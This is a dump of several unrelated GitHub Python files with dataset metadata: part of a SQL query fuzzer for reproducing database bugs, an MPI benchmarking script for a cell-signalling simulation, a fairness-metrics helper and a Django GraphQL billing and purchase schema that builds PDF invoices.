inst:\n print(\"exception in using set operations\", inst)\n # print(\"q1:\", literalquery(temp_query))\n # print(\"q2:\", literalquery(another_query))\n if success_flag is True:\n return temp_query\ndef reproduce_bug2(spec, query_count):\n print(\"begin reproduce bug about rewritting union to union all\")\n select_columns, where_clause, table_idx, selectable_columns = spec.gen_select_statement(\n )\n stmt = select(select_columns).where(where_clause)\n # stmt = stmt_complex(stmt, selectable_columns)\n # # trigger set operation generation\n temp_query = stmt\n success_flag = False\n for i in range(3):\n # try to create a super query that involve 10 set operations\n select_columns_, where_clause_, table_idx_, selectable_columns_ = spec.gen_select_statement(\n select_column_number=len(select_columns))\n # for j in range(len(select_columns_)):\n # c=select_columns_[j].label(\"subc\" + str(j))\n # select_columns_[j] = c\n # rearrange the column to match type\n reordered_select_columns_ = []\n for c in select_columns:\n for c_ in select_columns_:\n if ret_typename_from_class(c.type) == ret_typename_from_class(\n c_.type):\n reordered_select_columns_.append(c_)\n break\n reordered_select_columns_ = list(\n dict.fromkeys(reordered_select_columns_))\n\n if (len(reordered_select_columns_)) != len(select_columns):\n break\n print(len(reordered_select_columns_), len(select_columns))\n stmt_ = select(reordered_select_columns_).where(where_clause_)\n stmt_ = stmt_complex(stmt_, reordered_select_columns_)\n another_query = stmt_\n try:\n random_suffix = random.randint(100,200)\n query_union = run_set_operation(temp_query,\n another_query).alias('d'+str(random_suffix))\n # investigate how to output a subset column of a nested selectable\n # all_column_names = self.spec_stat[table_idx].column_name\n # selectable_column = []\n # for item in all_column_names:\n # selected_col = getattr(self.scope.alc_tables[table_idx].c, item)\n # selectable_column.append(selected_col)\n # print(\"unioned query\", literalquery(query_union))\n # selected_col = getattr(query_union.c, \"subc0\")\n # print(\"selected col is\", selected_col)\n # temp_query = select([selected_col])\n temp_query = select([query_union])\n success_flag = True\n except Exception as inst:\n print(\"exception in using set operations\", inst)\n # print(\"q1:\", literalquery(temp_query))\n # print(\"q2:\", literalquery(another_query))\n if (success_flag is True):\n query_count += 1\n print(literalquery(temp_query) + \";\", file=sys.stderr)\n return query_count\n\n\ndef reproduce_bug4(spec):\n select_columns, where_clause, table_idx, selectable_columns, joined_from, base_table = spec.gen_select_statement(\n )\n if joined_from is not None:\n stmt = select(select_columns).select_from(joined_from).where(where_clause)\n else:\n stmt = select(select_columns).where(where_clause)\n stmt = stmt_complex(stmt, selectable_columns)\n num_sub = len(Scope.table_ref_stmt_list)\n if (num_sub < 5 and len(select_columns) == 1 and base_table):\n # only store subquery that has one column\n print(\"add subquery\", stmt)\n Scope.table_ref_stmt_list.append(stmt)\n stmt_sub = stmt.apply_labels().alias('d'+str(num_sub))\n num_sub += 1\n Scope.table_ref_list.append(stmt_sub)\n elif (len(select_columns) == 1 and base_table):\n # if the subquery list is full, reset the list\n print(\"reset\")\n Scope.table_ref_stmt_list = []\n Scope.table_ref_stmt_list.append(stmt)\n Scope.table_ref_list = []\n stmt_sub = stmt.apply_labels().alias('d'+str(0))\n Scope.table_ref_list.append(stmt_sub)\n if (random_int_range(1000) < conf.PROB_TABLE[\"set\"] and len(select_columns) < 4):\n # set operation\n print(\"try generate set query\")\n set_query = set_query_generation(spec, stmt, select_columns)\n if set_query is not None:\n print(\"set success\")\n return set_query\n else:\n print(\"set failed\")\n\n # generate three new statements\n # TODO: scalar subquery\n # pick an existing subq\n\n\n return stmt\n\ndef reproduce_bug3(spec, query_count):\n # this has merged into gen_select_statement code\n select_columns, where_clause, table_idx, selectable_columns = spec.gen_select_statement(\n )\n # if where_clause is not None:\n # # first_ = select_columns[0]\n # # print(type(first_))\n # # a = first_.alias(name=\"demo\")\n # # select_columns[0] = a\n # stmt = select(select_columns).where(\n # where_clause)\n choice = random_int_range_contain_zero(1)\n sqlalchemy_tables = spec.scope.alc_tables.copy()\n table_a = spec.scope.alc_tables[table_idx]\n selectable_columns = []\n for item in table_a._columns:\n selectable_columns.append(item)\n if (choice == 1):\n try:\n # for table in sqlalchemy_tables[1:]:\n if (len(table_a.foreign_keys)):\n print(\"try joined using foreign key relationship\")\n # print(\"number of referenced table is\", table_a.foreign_keys)\n random.shuffle(sqlalchemy_tables)\n for fkey in table_a.foreign_keys:\n for table_b in sqlalchemy_tables:\n if (((fkey).references(table_b))):\n referenced_table = fkey.target_fullname.split(\n \".\")[0]\n if (random_int_range(1000) <\n conf.PROB_TABLE[\"inner\"]):\n j = table_a.join(table_b)\n elif (random_int_range(1000) <\n conf.PROB_TABLE[\"outer\"]):\n j = table_a.outerjoin(table_b, full=True)\n # left outer join\n elif (random_int_range(1000) <\n conf.PROB_TABLE[\"left\"]):\n j = table_a.join(table_b, isouter=True)\n # right outer join\n else:\n j = table_b.join(table_a, isouter=True)\n for item in table_b._columns:\n # print(type(item))\n # selected_col = getattr(table_b, item)\n selectable_columns.append(item)\n random_columns = random.choices(\n selectable_columns,\n k=min(\n 4,\n randoms.random_int_range(\n len(selectable_columns))))\n stmt = select(random_columns).select_from(j)\n stmt = stmt_complex(stmt, selectable_columns)\n print(literalquery(stmt) + \";\", file=sys.stderr)\n query_count += 1\n return query_count\n except Exception as inst:\n print(\"exception in join operations\", inst, sys.exc_info())\n # return query_count\n try:\n random_idx = random_int_range_contain_zero(len(select_columns) - 1)\n random_column = select_columns[random_idx]\n random.shuffle(sqlalchemy_tables)\n for table_b in sqlalchemy_tables:\n if table_b != table_a:\n for c in table_b.columns:\n # print(c.type)\n # if (c.type is (random_column.type)):\n if (isinstance(c.type, type(random_column.type))):\n if (random_int_range(1000) < conf.PROB_TABLE[\"true\"]):\n if (random_int_range(1000) <\n conf.PROB_TABLE[\"inner\"]):\n j = table_a.join(table_b, true())\n elif (random_int_range(1000) <\n conf.PROB_TABLE[\"outer\"]):\n j = table_a.outerjoin(table_b,\n true(),\n full=True)\n # left outer join\n elif (random_int_range(1000) <\n conf.PROB_TABLE[\"left\"]):\n j = table_a.join(table_b, true(), isouter=True)\n # right outer join\n else:\n j = table_b.join(table_a, true(), isouter=True)\n else:\n if (random_int_range(1000) <\n conf.PROB_TABLE[\"inner\"]):\n j = table_a.join(table_b, false())\n elif (random_int_range(1000) <\n conf.PROB_TABLE[\"outer\"]):\n j = table_a.outerjoin(table_b,\n false(),\n full=True)\n # left outer join\n elif (random_int_range(1000) <\n conf.PROB_TABLE[\"left\"]):\n j = table_a.join(table_b,\n false(),\n isouter=True)\n # right outer join\n else:\n j = table_b.join(table_a,\n false(),\n isouter=True)\n for item in table_b._columns:\n selectable_columns.append(item)\n random_columns = random.choices(\n selectable_columns,\n k=min(\n 4,\n randoms.random_int_range(\n len(selectable_columns))))\n stmt = select(random_columns).select_from(j)\n stmt = stmt_complex(stmt, selectable_columns)\n query_count += 1\n print(literalquery(stmt) + \";\", file=sys.stderr)\n return query_count\n except Exception as inst:\n print(\"exception in join operations\", inst, sys.exc_info())\n return query_count\n\n\ndef main():\n signal.signal(signal.SIGINT,\n exit_gracefully(signal.getsignal(signal.SIGINT)))\n\n # DEFINE PARSER (strategy)\n main_parser = argparse.ArgumentParser()\n main_parser.add_argument(\"-s\",\n \"--strategy\",\n dest=\"strategy\",\n type=str,\n default=None,\n help=\"Mutation strategy\",\n required=True)\n main_parser.add_argument('--db_info',\n type=str,\n nargs='?',\n default=\".\",\n help='database name',\n required=True)\n main_parser.add_argument('--output',\n type=str,\n nargs='?',\n default='demo.sql',\n help=\"generate queries file\")\n main_parser.add_argument('--queries',\n type=int,\n nargs='?',\n default=1,\n help='number of queries generated',\n required=True)\n main_parser.add_argument('--dialect ')\n main_parser.add_argument(\n '--prob_table',\n type=str,\n nargs='?',\n default='.',\n help='prob table for controlling the query generation',\n required=True)\n\n main_parser.set_defaults(action='mutation')\n args = main_parser.parse_args()\n\n load_pbtable(args.prob_table)\n \n if args.db_info != \".\":\n config_data = {}\n try:\n with open(args.db_info) as f:\n config_data = json.load(f)\n tables, tables_stat, sqlalchemy_tables, alc_tables = load_existing_dbschema(\n config_data)\n cs = CreateSequences(max_table=config_data[\"max_table\"],\n max_column=config_data[\"max_column\"],\n db_name=config_data[\"name\"],\n max_tuple=15000000)\n cs.update_from_existing_db(tables, tables_stat,\n sqlalchemy_tables, alc_tables)\n query_count = 0\n while (query_count < args.queries):\n # ************ Begin doing SQLSMITH STUFF ***********\n # ************ reproduce bug1 ***********\n scope = Scope()\n scope.add_alc(sqlalchemy_tables)\n # global spec\n spec = Query_Spec(\"demo\", tables, tables_stat, scope)\n stmt = reproduce_bug4(spec)\n print(\"GENENOFIJOWIEJFW\")\n print(stmt)\n print(\"flag\")\n try:\n stmt_string = literalquery(stmt)\n print(stmt_string.replace(\"ON 1\", \"ON TRUE\") + \";\", file=sys.stderr)\n query_count += 1\n print(\"success print literalquery\")\n except:\n traceback.print_stack()\n traceback.print_exception()\n print(\"error in printing out query\")\n\n print(\"Total number of queries generated is\", query_count)\n\n except Exception as inst:\n print('print_exc():')\n traceback.print_exc(file=sys.stdout)\n print(type(inst), inst.args, inst)\n exit(1)\n \n \n if args.strategy == 'sequence':\n\n drop_db = \"drop database sqlalchemy\"\n create_db = \"create database sqlalchemy\"\n\n run_query_pg(drop_db)\n run_query_pg(create_db)\n run_query_my(drop_db)\n run_query_my(create_db)\n\n cs = CreateSequences(max_table=randoms.random_int_range(5) + 1,\n max_column=5,\n max_tuple=10)\n cs.create_tables()\n print(\"finish creating database schema\")\n cs.insert_tuples()\n # cs.select_tuples()\n # cs.update_tuples_sqlalchemy()\n # cs.delete_tuples()\n # cs.gen_sqlsmith_queries()\n\n # cs.mutation(\"index\")\n # print(\"Finish creating index\")\n # cs.mutation(\"select\")\n # cs.mutation(\"where\")\n else:\n pass\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n # for c in table_b.columns:\n # # print(c.type)\n # # if (c.type is (random_column.type)):\n # # j = table_a.join(table_b)\n # # subquery 1\n # j = table_a.outerjoin(table_b, true(), full=False)\n # stmt = select(selectable_columns_a +\n # selectable_columns_b).select_from(j).alias('d1')\n # # subquery 2\n # j_ = table_a.outerjoin(table_b, true(), full=True)\n # stmt_ = select(selectable_columns_a +\n # selectable_columns_b).select_from(j).alias('d2')\n\n # j_ = stmt.outerjoin(stmt_, true())\n # random_columns_from_stmt = random.sample(\n # get_selectable_column(stmt) + get_selectable_column(stmt_),\n # random_int_range(len(get_selectable_column(stmt))))\n\n # stmt_ = select(random_columns_from_stmt).select_from(j_).limit(\n # 10)\n # # print(literalquery(stmt_))\n\n\n\n# def choose_columns_sqlalchemy(table, column_names, option):\n# # table: sqlalchemy object\n# # column_names: string\n\n# if option == \"one\":\n# num_cols = 1\n# chosen_columns = random.choices(\n# column_names, k=randoms.random_int_range(num_cols))\n\n# elif option == \"all\":\n# chosen_columns = column_names\n\n# elif option == \"wo_idx\":\n# # TODO: fix here (like with_idx)\n# defined_indexes = set(map(lambda x: x.name, list(table.indexes)))\n# chosen_columns = list(set(column_names) - defined_indexes)\n\n# elif option == \"with_idx\":\n# # print(str(list(list(table.indexes)[0].columns)[0]).split(\".\")[1])\n# chosen_columns = list(\n# map(lambda x: str(list(x.columns)[0]).\n# split(\".\")[1], list(table.indexes)))\n\n# else:\n# num_cols = len(column_names)\n# chosen_columns = random.choices(\n# column_names, k=randoms.random_int_range(num_cols))\n\n# out = []\n# for item in chosen_columns:\n# # print(table.c)\n# # print(item)\n# selected_col = getattr(table.c, item)\n# out.append(selected_col)\n\n# return out\n","repo_name":"luke9kim8/QueryGen","sub_path":"sqlfuzz/mutator.py","file_name":"mutator.py","file_ext":"py","file_size_in_byte":78856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18681114528","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport csv\nimport numpy as np\n\nratios = np.append(np.logspace(-1.5,1.5,12), [1])\nDs = [0.06, 4.0]\ndata = []\n\nfor D in Ds:\n for ratio in ratios: \n print(\"running pSpatiocyte MAPK model with diffusion coefficient, D:\", D,\n \"ratio:\", ratio)\n ratio_str = '{:.4f}'.format(ratio)\n dirname = 'D_'+str(D)+'__ratio_'+ratio_str\n result = subprocess.run(['mpirun', '-np', '8', 'mapk', dirname, str(D),\n str(ratio)], stdout=subprocess.PIPE)\n time = float(result.stdout.decode('utf-8').split('\\n')[-2])\n data.append([D, ratio, time])\n print('\\telapsed time:',time)\n\nwith open(\"elapsed_time.txt\", \"w+\") as f:\n writer = csv.writer(f)\n writer.writerow(['D', 'ratio', 'elapsed_time'])\n for row in data:\n writer.writerow(row)\n\n\n","repo_name":"satya-arjunan/pspatiocyte","sub_path":"src/pspatiocyte/models/mapk/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29589169359","text":"from sklearn.metrics import accuracy_score, precision_score, confusion_matrix\nfrom sklearn.metrics import recall_score, f1_score\nfrom fairlearn.metrics import MetricFrame\nfrom fairlearn.metrics import count, selection_rate, mean_prediction\nfrom fairlearn.metrics import false_negative_rate, false_positive_rate\nfrom fairlearn.metrics import true_negative_rate, true_positive_rate\n\ndef eval_clf_fairness(y_true, y_pred, z_true, binary=True):\n metrics = {\n \"accuracy\": accuracy_score,\n \"confusion matrix\": confusion_matrix,\n \"count\": count\n }\n if binary:\n metrics.update({\n \"recall\": recall_score,\n \"precision\": precision_score,\n \"f1 score\": f1_score,\n \"mean prediction\": mean_prediction,\n \"selection rate\": selection_rate,\n \"false negative rate\": false_negative_rate,\n \"false positive rate\": false_positive_rate,\n \"true negative rate\": true_negative_rate,\n \"true positive rate\": true_positive_rate\n })\n metric_frame = MetricFrame(metrics=metrics,\n y_true=y_true,\n y_pred=y_pred,\n sensitive_features=z_true)\n return metric_frame","repo_name":"zeyuyang8/wellearn","sub_path":"src/metrics/fairness.py","file_name":"fairness.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9335185659","text":"import graphene\nfrom graphene_django.filter import DjangoFilterConnectionField\nfrom graphene_django.types import DjangoObjectType\nfrom app.models import *\nfrom graphene import relay\nfrom django.contrib.auth.models import User\nfrom graphene.relay.node import from_global_id\nimport datetime\nfrom django.contrib.auth import get_user_model\nfrom django.core.files import File\nfrom django.template.loader import get_template \nfrom django.template import Context\nimport pdfkit\nimport os\nfrom fpdf import FPDF\nimport django_filters\nfrom django_filters import FilterSet\nfrom graphene_file_upload.scalars import Upload\nfrom django.db.models import Q\n\nclass Dashboard(graphene.ObjectType):\n sales = graphene.Int()\n purchase = graphene.Int()\n\n def resolve_sales(parent,info):\n print(parent)\n\n return parent['sales']\n \n def resolve_purchase(parent,info):\n return parent['purchase']\n\nclass InvoiceNumber(graphene.ObjectType):\n last_number = graphene.Int()\n exist = graphene.Boolean()\n def resolve_last_number(parent,info):\n return parent[\"last_number\"]\n def resolve_exist(parent,info):\n return parent[\"exist\"]\n\n# class LedgerCustom(graphene.ObjectType):\n\n\nclass BankNode(DjangoObjectType):\n class Meta:\n model = Bank\n filter_fields=()\n interfaces = (relay.Node,)\n\nclass LedgerNode(DjangoObjectType):\n class Meta:\n model = Ledgers\n filter_fields=()\n interfaces = (relay.Node,)\n\n\nclass UserNode(DjangoObjectType):\n class Meta:\n model = User\n filter_fields=()\n interfaces = (graphene.Node,)\n # interfaces = (relay.Node,)\n# class PurchaseProductFilter(FilterSet):\n# purchase_id = django_filters.NumberFilter(field_name=\"purchase__id\",lookup_expr=\"exact\")\n# class Meta:\n# model = PurchaseProduct\n# fields = [\"purchase__id\"]\n\n\nclass PurchaseProductNode(DjangoObjectType):\n class Meta:\n model = PurchaseProduct\n filter_fields=()\n # filterset_class = PurchaseProductFilter\n interfaces = (relay.Node,)\n\n\nclass PurchaseFilter(FilterSet):\n vendor__iexact = django_filters.CharFilter(field_name=\"vendor__name\",lookup_expr=\"iexact\")\n date_gte = django_filters.DateFilter(field_name=\"date\",lookup_expr=\"gte\")\n date_lte = django_filters.DateFilter(field_name=\"date\",lookup_expr=\"lte\")\n class Meta:\n model = Purchase\n fields = [\"vendor__name\",\"date_gte\",\"date_lte\"]\n \n filter_fields={\n # \"vendor__name\":[\"iexact\"],\n \"date\":[\"lte\",\"gte\"],\n }\n @property\n def qs(self):\n return super(PurchaseFilter,self).qs.filter(user_id = self.request.user.id) \n\nclass PurchaseNode(DjangoObjectType):\n class Meta:\n model = Purchase\n # filter_fields=()\n \n\n filterset_class = PurchaseFilter\n interfaces = (relay.Node,)\n products = graphene.Int()\n originalId = graphene.Int()\n def resolve_products(self,info):\n return len(PurchaseProduct.objects.filter(purchase_id = self.id))\n def resolve_originalId(self,info):\n return self.id\n\nclass ProductFilter(FilterSet):\n name_startswith = django_filters.CharFilter(field_name=\"name\", lookup_expr=\"icontains\")\n class Meta:\n model = Product\n fields = [\"name\",]\n @property\n def qs(self):\n return super(ProductFilter,self).qs.filter(user_id = self.request.user.id)\n\n\nclass ProductNode(DjangoObjectType):\n class Meta:\n model = Product\n filterset_class = ProductFilter\n # filter_fields=()\n interfaces = (relay.Node,)\n \nclass CategoryNode(DjangoObjectType):\n subCategory = graphene.Int()\n product = graphene.Int()\n class Meta:\n model = Category\n filter_fields = ()\n interfaces = (relay.Node,)\n def resolve_subCategory(self,info):\n return len(SubCategory.objects.filter(category_id=self.id))\n def resolve_product(self,info):\n return len(Product.objects.filter(subcategory_id__in=[i.id for i in SubCategory.objects.filter(category_id=self.id)]))\n\nclass SubCategoryNode(DjangoObjectType):\n product = graphene.Int()\n class Meta:\n model = SubCategory\n filter_fields = ()\n interfaces = (relay.Node,)\n def resolve_product(self,info):\n return len(Product.objects.filter(subcategory_id=self.id))\n\nclass ProfileNode(DjangoObjectType):\n class Meta:\n model = Profile\n filter_fields=()\n interfaces = (relay.Node,)\n\nclass BillingFilter(FilterSet):\n # customer__name = django_filters.CharFilter(lookup_expr=[\"iexact\"])\n customer__iexact = django_filters.CharFilter(field_name=\"customer__name\",lookup_expr=\"in\")\n\n # INV#8-6\n class Meta:\n model = Billing\n fields = [\"customer__name\",\"invoice_number\"]\n @property\n def qs(self):\n return super(BillingFilter,self).qs.filter(user_id = self.request.user.id).order_by(\"-id\")\n\nclass PartialPaymentNode(DjangoObjectType):\n class Meta:\n model = ParitalPayment\n filter_fields =()\n interfaces = (relay.Node,)\n\nclass BillingNode(DjangoObjectType):\n class Meta:\n model = Billing\n # filter_fields = [\"customer__name\",]\n filterset_class = BillingFilter\n # filter_fields={\n # \"customer__name\":[\"exact\",\"iexact\"], \n # }\n\n interfaces = (relay.Node,)\n\nclass CSaleFilter(FilterSet):\n # name_startswith = django_filters.CharFilter(field_name=\"name\", lookup_expr=\"icontains\")\n isAdded = django_filters.BooleanFilter(field_name=\"customer__outstanding_add\",lookup_expr=\"exact\")\n\n class Meta:\n model = CSales\n fields = [\"isAdded\",]\n # filter_fields={\n # # \"vendor__name\":[\"iexact\"],\n # \"sales\":[\"lte\",\"gte\"],\n \n @property\n def qs(self):\n return super(CSaleFilter,self).qs.filter(user_id = self.request.user.id)\n\n\nclass CSalesNode(DjangoObjectType):\n class Meta:\n model = CSales\n # filter_fields = ()\n filterset_class = CSaleFilter\n # filter_fields={\n # # \"vendor__name\":[\"iexact\"],\n # \"sales\":[\"lte\",\"gt\"],\n # }\n interfaces = (relay.Node,)\n\n\nclass VPurchaseNode(DjangoObjectType):\n class Meta:\n model = VPurchase\n filter_fields={\n \"vendor__name\":[\"exact\"]\n }\n interfaces = (relay.Node,)\n\n\nclass CustomerFilter(FilterSet):\n name = django_filters.CharFilter(field_name=\"name\", lookup_expr=\"icontains\")\n company_Icontains = django_filters.CharFilter(field_name=\"company\", lookup_expr=\"icontains\")\n # sales = django_filters.NumberFilter(field_name=\"\")\n # name_startswith = django_filters.CharFilter(field_name=\"name\", lookup_expr=\"icontains\")\n class Meta:\n model = Customer\n fields = [\"name\",\"company\",\"outstanding_add\",\"company_Icontains\"]\n @property\n def qs(self):\n return super(CustomerFilter,self).qs.filter(user_id = self.request.user.id)\n\nclass CustomerNode(DjangoObjectType):\n sales = graphene.Float()\n paid = graphene.Float()\n outstanding = graphene.Float()\n\n\n\n # purchase = graphene.Int()\n class Meta:\n model = Customer\n # filter_fields={\n # \"name\":[\"exact\",\"iexact\"]\n # }\n filterset_class = CustomerFilter\n\n\n interfaces = (relay.Node,)\n def resolve_sales(self,info):\n return sum([i.net_amount for i in Customer.objects.get(id=self.id).billing_set.all()])\n \n def resolve_paid(self,info):\n return sum([i.paid for i in Customer.objects.get(id=self.id).paritalpayment_set.all()])\n def resolve_outstanding(self,info):\n return sum([i.outstanding for i in Customer.objects.get(id=self.id).paritalpayment_set.all()])\n\n \nclass Sales_ProductNode(DjangoObjectType):\n class Meta:\n model = Sales_Product\n filter_fields=()\n interfaces = (relay.Node,) \n\nclass VendorFilter(FilterSet):\n name_contains = django_filters.CharFilter(field_name=\"name\",lookup_expr=\"icontains\")\n company_Icontains = django_filters.CharFilter(field_name=\"company\", lookup_expr=\"icontains\")\n class Meta:\n model = Vendor\n fields = [\"name\",\"company\",\"outstanding_add\",\"company_Icontains\"]\n @property\n def qs(self):\n return super(VendorFilter,self).qs.filter(user_id = self.request.user.id)\n\n\nclass VendorNode(DjangoObjectType):\n purchase = graphene.Float()\n paid = graphene.Float()\n outstanding = graphene.Float()\n\n class Meta:\n model = Vendor\n # filter_fields = ()\n filterset_class = VendorFilter\n interfaces = (relay.Node,)\n\n def resolve_purchase(self,info):\n return sum([i.total_bill for i in Vendor.objects.get(id=self.id).purchase_set.all()])\n \n def resolve_paid(self,info):\n return sum([i.paid for i in Vendor.objects.get(id=self.id).paritalpayment_set.all()])\n def resolve_outstanding(self,info):\n return sum([i.outstanding for i in Vendor.objects.get(id=self.id).paritalpayment_set.all()])\n\nclass StateNode(DjangoObjectType):\n class Meta:\n model = State\n filter_fields = ()\n interfaces = (relay.Node,)\nclass CityNode(DjangoObjectType):\n class Meta:\n model = City\n filter_fields = ()\n interfaces = (relay.Node,)\n\n\nclass CreateProduct(graphene.Mutation):\n class Arguments:\n is_new = graphene.Boolean(required=True)\n pid = graphene.String(required=True)\n\n name = graphene.String(required=True)\n taga = graphene.Float(required=True)\n grossm = graphene.Float(required=True)\n less = graphene.Float(required=True)\n netm = graphene.Float(required=True)\n # qty = graphene.Int(required=True)\n # typeofpacking = graphene.String(required=True)\n\n\n # mrp = graphene.Float(required=True)\n cost_price = graphene.Float(required=True)\n list_price = graphene.Float(required=True)\n # purchase_from = graphene.String(required=True)\n \n # gst = graphene.String(required=True)\n # mfg = graphene.String(required=True)\n exp = graphene.String(required=True)\n # exp_time = graphene.Int(required=True)\n\n # discount = graphene.Float(required=True)\n hsn = graphene.String(required=True)\n # batch = graphene.String(required=True)\n\n # category_id = graphene.ID(required=True)\n # sub_category_id = graphene.ID(required=True)\n\n product = graphene.Field(ProductNode)\n isNew = graphene.Boolean()\n def mutate(self,info,pid,is_new,name,taga,grossm,less,netm, cost_price,list_price,exp,hsn):\n # p = Product.objects.filter(name=name)\n if(is_new is False):\n p = Product.objects.get(id=from_global_id(pid)[1])\n p.name = name\n p.taga = taga\n # p.type_of_packing = typeofpacking\n\n # p.mrp = mrp\n p.price = list_price\n p.cost = cost_price\n\n # p.mfg = mfg\n p.expiry_date = datetime.datetime.strptime(exp,\"%Y-%m-%d\") \n # p.expiry_time = exp_time\n\n # p.discount = discount\n p.hsn = hsn\n p.grossm = grossm\n p.netm = netm\n p.less = less\n # p.batch = batch\n # p.subcategory_id = from_global_id(sub_category_id)[1]\n p.save()\n\n return CreateProduct(product = p,isNew = False)\n \n\n else:\n product = Product.objects.create(\n name = name,\n taga = taga,\n # qty = qty,\n # type_of_packing = typeofpacking,\n\n # mrp = mrp,\n price = list_price,\n cost = cost_price,\n\n # mfg = mfg,\n expiry_date = datetime.datetime.strptime(exp,\"%Y-%m-%d\") ,\n # expiry_time = exp_time,\n\n # discount = discount,\n hsn = hsn,\n # batch = batch,\n grossm = grossm,\n netm = netm,\n less = less,\n user_id=info.context.user.id,\n # subcategory_id = from_global_id(sub_category_id)[1]\n )\n return CreateProduct(product = product,isNew = True)\n \n\nclass MInput(graphene.InputObjectType):\n product_id = graphene.String(required=True)\n name = graphene.String(required=True)\n # qty = graphene.Int()\n grossm = graphene.Float()\n less = graphene.Float()\n net = graphene.Float()\n price = graphene.Float()\n taga = graphene.String()\n # gst = graphene.Float()\n # discount = graphene.Float()\n # expiry = graphene.String()\n\n\nclass PurchaseInput(graphene.InputObjectType):\n product_id = graphene.String(required=True)\n name = graphene.String(required=True)\n # qty = graphene.Int()\n # taga = graphene.Int()\n # mrp = graphene.Float()\n grossm = graphene.Float()\n less = graphene.Float()\n netm = graphene.Float()\n price = graphene.Float()\n cost = graphene.Float()\n discount = graphene.Float()\n\n\nclass AddPurchase(graphene.Mutation):\n class Arguments:\n vendor_id = graphene.ID(required=True)\n invoice_date = graphene.String(required=True)\n invoice_number = graphene.String(required=True)\n products = graphene.List(PurchaseInput)\n invoice = Upload(required=True)\n purchase = graphene.Field(PurchaseNode)\n def mutate(self,info,vendor_id,invoice_date,invoice_number,products,invoice,**kwargs):\n purchase = Purchase.objects.create(vendor_id = from_global_id(vendor_id)[1],invoice_date = datetime.datetime.strptime(invoice_date,\"%Y-%m-%d\"),invoice_number = invoice_number,user_id=info.context.user.id)\n \n # print(info.context.FILES)\n # print(invoice)\n # print(kwargs)\n\n # purchase = Purchase.objects.get(id=7)\n for i in products:\n PurchaseProduct.objects.create(\n product_id = from_global_id(i.product_id)[1],\n # qty = i.qty,\n # mrp = i.mrp,\n grossm = i.grossm,\n less = i.less,\n netm = i.netm,\n list_price = i.price,\n cost = i.cost,\n discount = i.discount,\n purchase_id = purchase.id\n )\n Ledgers.objects.create(purchase_id = purchase.id,user_id = info.context.user.id)\n # purchase = Purchase.objects.get(id=7)\n return AddPurchase(purchase = purchase)\n\n\n\ndef generate_receipt(bill,products,user): \n pdf = FPDF(orientation='P', unit='pt', format='A4') \n pdf.add_page() \n pdf.set_font(\"Arial\", \"B\", 17) \n pdf.cell(0, 30, \"{}\".format(user.profile.firm_name), 0, 0, \"L\") \n pdf.cell(0,30,\"Invoice\",0,1,\"R\") \n pdf.set_font(\"Arial\", \"\", 12) \n pdf.cell(0,20,\"{}\".format(user.profile.address),0,0,\"L\") \n pdf.cell(0,20,\"Invoice Number : {}\".format(bill.invoice_number),0,1,\"R\") \n pdf.cell(0,20,\"{}\".format(user.profile.contact_number),0,0,\"L\") \n pdf.cell(0,20,\"Date: {}\".format(bill.billing_date.strftime(\"%b %d, %Y\")),0,1,\"R\") \n pdf.cell(0,23,\"{}\".format(user.profile.GST_no),0,1,\"L\") \n pdf.cell(0,23,\"Bill to\",0,1,\"L\") \n pdf.set_font(\"Arial\",\"B\",13) \n pdf.cell(0,20,\"{}\".format(bill.customer.name),0,1,\"L\") \n pdf.set_font(\"Arial\",\"\",12) \n pdf.cell(0,20,\"{}\".format(bill.customer.mobile),0,1,\"L\") \n epw = pdf.w - 2*pdf.l_margin \n # col_width = epw/4 \n th = pdf.font_size \n pdf.ln(th*4) \n \n # for row in data: \n # for datum in row: \n # pdf.cell(col_width, 2*th, str(datum), border=1) \n # pdf.ln(2*th) \n # pdf.ln(2*th) \n pdf.set_font(\"Arial\", \"B\", 8)\n pdf.cell(20, 2*th, \"Sn.\",1,0,\"C\")\n pdf.cell(100, 2*th, \"Name\",1,0,\"C\")\n pdf.cell(40, 2*th, \"Pack\",1,0,\"C\")\n pdf.cell(45, 2*th, \"HSN\",1,0,\"C\")\n pdf.cell(30, 2*th, \"Exp\",1,0,\"C\")\n pdf.cell(40, 2*th, \"Batch\",1,0,\"C\")\n pdf.cell(40, 2*th, \"MFG.\",1,0,\"C\")\n \n # 315\n\n pdf.cell(20, 2*th, \"Qty\",1,0,\"C\")\n pdf.cell(40, 2*th, \"MRP\",1,0,\"C\")\n pdf.cell(40, 2*th, \"Dis%\",1,0,\"C\")\n pdf.cell(40, 2*th, \"SGST\",1,0,\"C\")\n pdf.cell(40, 2*th, \"CGST\",1,0,\"C\")\n pdf.cell(40, 2*th, \"Total\",1,0,\"C\")\n pdf.ln(2*th)\n\n for index,i in enumerate(products,start=1):\n\n\n \n pdf.set_font(\"Arial\", \"\", 8)\n pdf.cell(20, 2*th, str(index),1,0,\"C\")\n pdf.set_font(\"Arial\", \"B\", 8)\n pdf.cell(100, 2*th, str(i.product_name.upper()),1,0,\"C\")\n pdf.set_font(\"Arial\", \"\", 8)\n if(i.product.type_of_packing):\n pdf.cell(40, 2*th, str(i.product.type_of_packing),1,0,\"C\")\n else:\n pdf.cell(40, 2*th, str(\" - \"),1,0,\"C\")\n \n if(i.product.subcategory.hsn):\n pdf.cell(45, 2*th, str(i.product.subcategory.hsn),1,0,\"C\")\n else:\n pdf.cell(45, 2*th, str(\" - \"),1,0,\"C\")\n if(i.expiry_date):\n pdf.cell(30, 2*th, str(i.expiry_date.strftime(\"%m/%y\")),1,0,\"C\")\n else:\n pdf.cell(40, 2*th, str(\" - \"),1,0,\"C\")\n\n if(i.product.batch):\n pdf.cell(40, 2*th, str(i.product.batch),1,0,\"C\")\n else:\n pdf.cell(40, 2*th, str(\" - \"),1,0,\"C\")\n\n if(i.product.mfg):\n pdf.cell(40, 2*th, str(i.product.mfg),1,0,\"C\")\n else:\n pdf.cell(40, 2*th, str(\" - \"),1,0,\"C\")\n\n pdf.cell(20, 2*th, str(i.quantity),1,0,\"C\")\n pdf.cell(40, 2*th, str(i.price),1,0,\"C\")\n pdf.cell(40, 2*th, str(i.discount),1,0,\"C\")\n \n pdf.cell(40, 2*th, str(i.CGST),1,0,\"C\")\n 